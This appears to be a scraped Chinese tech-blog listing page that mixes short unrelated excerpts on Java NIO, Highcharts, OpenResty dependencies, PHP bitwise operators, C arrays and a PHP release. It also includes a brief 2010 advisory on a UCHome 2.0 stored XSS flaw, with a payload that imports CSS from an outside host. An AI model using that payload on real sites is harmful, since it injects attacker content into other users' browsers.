利用条件:开启注册&&开启投稿
方法 :注册会员 -> 发表文章:内容输入
<style>@import 'http://xxx.com/xss.css';</style>
作者:AlbertWen
添加时间:2012-05-29 23:03:56
修改时间:2025-05-01 19:57:26
分类:16.编程基础/Web安全
编辑
作者:AlbertWen
添加时间:2012-05-29 23:04:34
修改时间:2025-04-19 08:28:38
分类:16.编程基础/Web安全
编辑
发布时间:2010-09-03
影响版本:uchome 2.0
漏洞描述:看源码分析的,出错位置较敏感,而且基本没有利用限制,个人主页自定义风格时,可@import外部css文件
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
Java NIO中的Buffer用于和NIO通道进行交互。如你所知,数据是从通道读入缓冲区,从缓冲区写入到通道中的。
作者:AlbertWen
添加时间:2014-07-03 15:36:00
修改时间:2025-05-09 23:24:17
分类:06.前端/Vue/Node.js
编辑
Highcharts是一个制作图表的纯JavaScript类库,主要特性如下:
兼容性:兼容当今所有的浏览器,包括iPhone、IE(IE6,IE7,IE8等)和火狐等等;
对个人用户完全免费;
纯JS,无BS;
支持大部分的图表类型:直线图,曲线图、区域图、区域曲线图、柱状图、饼装图、散布图;
跨语言:不管是PHP、Asp.net还是Java都可以使用,它只需要三个文件:一个是Highcharts的核心文件highcharts.js,还有a canvas emulator for IE和Jquery类库或者MooTools类库;
简单来讲,Selector会不断地轮询注册在其上的Channel,如果某个Channel上面有新的TCP连接接入、读和写事件,这个Channel就处于就绪状态,会被Selector轮询出来,然后通过SelectionKey可以获取就绪Channel的集合,进行后续的I/O操作。
作者:AlbertWen
添加时间:2019-03-23 16:30:03
修改时间:2025-04-30 06:23:47
分类:15.OpenResty_Lua
编辑
- libssl 是为了可以使用HTTPS功能
- libpcre 是为了可以使用正则表达式,主要是为了伪静态重写等
- zlib 将文本可以使用gzip压缩等
位运算符允许对整型数中指定的位进行求值和操作。
| 例子 | 名称 | 结果 |
|---|---|---|
$a & $b |
And(按位与) | 将把 $a 和 $b 中都为 1 的位设为 1。 |
$a | $b |
Or(按位或) | 将把 $a 和 $b 中任何一个为 1 的位设为 1。 |
$a ^ $b |
Xor(按位异或) | 将把 $a 和 $b 中一个为 1 另一个为 0 的位设为 1。 |
~ $a |
Not(按位取反) | 将 $a 中为 0 的位设为 1,反之亦然。 |
$a << $b |
Shift left(左移) | 将 $a 中的位向左移动 $b 次(每一次移动都表示“乘以 2”)。 |
$a >> $b |
Shift right(右移) | 将 $a 中的位向右移动 $b 次(每一次移动都表示“除以 2”)。 |
作者:AlbertWen
添加时间:2017-12-13 14:22:52
修改时间:2025-04-23 20:09:42
分类:13.C/C++/仓颉
编辑
以前一直有种误解:
二维数组的是数组的数组,所以数组的首地址是指向第一个元素指针,而这个元素又是一个数组,所以把数组首地址理解为 指向指针的指针。
PHP 5.3.27 发布。2013-07-12 经过1个RC 上个版本是2013-06-07的5.3.26,修正了大约10个Bug以及几个安全漏洞,其他产品线 5.5.0/5.4.17,注意这将是5.3系列最后一个常规版本,PHP官方建议用户应该升级到 5.4或5.5,但安全更新会持续到明年。